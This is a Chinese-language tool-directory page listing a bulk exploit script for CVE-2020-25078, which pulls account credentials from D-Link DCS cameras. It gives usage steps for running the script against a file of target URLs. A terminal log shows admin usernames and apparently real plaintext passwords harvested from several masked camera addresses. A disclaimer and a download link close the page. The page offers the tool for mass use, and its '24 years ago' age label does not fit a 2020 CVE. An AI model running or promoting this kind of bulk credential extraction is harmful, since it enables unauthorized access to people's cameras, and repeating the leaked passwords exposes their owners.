Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2020-25078 — 针对 CVE-2020-25078 的批量漏洞利用脚本,目标为 D-Link DCS 系列摄像头,通过信息泄露漏洞提取账户凭据。 | Kitploit
工具/GitHubGitHub/chinayozz/cve-2020-25078
物联网安全密码攻击漏洞分析漏洞利用Web应用程序漏洞利用信息收集
GitHubchinayozz/cve-2020-25078

CVE-2020-25078

针对 CVE-2020-25078 的批量漏洞利用脚本,目标为 D-Link DCS 系列摄像头,通过信息泄露漏洞提取账户凭据。

查看仓库
24年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2020-25078

使用说明

instructions

攻击url放同一目录下 ip.txt

The attack IP is placed in the same directory as ip.txt

Terminal log

root@localhost:~/CVE-2020-25078#ls

CVE-2020-25078.py ip.txt

root@localhost:~/CVE-2020-25078#cat ./ip.txt

https://xxx.xxx.xxx.xxx:3128

http://xxx.xxx.xxx.xxx:80

https://xxx.xxx.xxx.xxx:8080

https://xxx.xxx.xxx.xxx:443

root@localhost:~/CVE-2020-25078#python3 ./CVE-2020-25078.py

Start Running Exploit...

[+Login URL]==> http://xxx.xxx.xxx.xxx:80 UserName: ['admin'] PassWord: ['Sruthimina123']

[+Login URL]==> http://xxx.xxx.xxx.xxx:443 UserName: ['admin'] PassWord: ['ming502219']

root@localhost:~/CVE-2020-25078# ls -l

CVE-2020-25078.py

exploit_ok.txt

ip.txt

README.md

root@localhost:~/CVE-2020-25078# cat ./exploit_ok.txt

[+Login URL]==>http://xxx.xxx.xxx.xxx:80 [+UserName]==>['admin'] [+PassWord]==>['Sruthimina123']

[+Login URL]==>http://xxx.xxx.xxx.xxx:443 [+UserName]==>['admin'] [+PassWord]==>['ming502219']

root@localhost:~/CVE-2020-25078#

免责声明

Disclaimers

由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。 Any direct or indirect consequences and losses caused by the dissemination and use of the information provided in this article shall be borne by the user himself, and the author shall not bear any responsibility for this.

下载工具